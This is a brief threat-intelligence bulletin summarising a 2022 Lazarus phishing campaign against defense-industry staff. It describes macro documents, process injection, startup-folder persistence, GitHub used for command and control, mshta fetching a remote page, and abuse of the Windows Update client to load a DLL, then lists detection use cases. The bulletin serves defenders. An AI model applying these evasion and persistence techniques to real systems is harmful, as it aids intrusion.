February 01, 2022

Lazarus Uses Windows Update Client

Industry: Defense | Level: Operational | Source: Malwarebytes

Malwarebytes Threat Intelligence team has identified a new wave of threat activity from North Korean threat group Lazarus that was observed as early as January 18th, 2022. Similar to past campaigns the group’s phishing theme involves new job opportunities to entice potential victims, particularly targeting victims in the defense industry as the job offers are posed to have originated from Lockheed Martin, BAE Systems, Boeing and Northrop Grumman. One of the two malicious documents makes use of multiple process injections for defense evasion and achieves persistence from the startup folder. A first also for a Lazarus campaign is the usage of GitHub as its C2. The second malicious document’s main difference is upon macro execution, mshta will execute a remote HTML page. The new campaign leverages the Windows Update client to evade security detection by utilizing the process to run a malicious DLL from an LNK file.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Execution from Startup Folder
    • Symbolic OR Hard File Link Created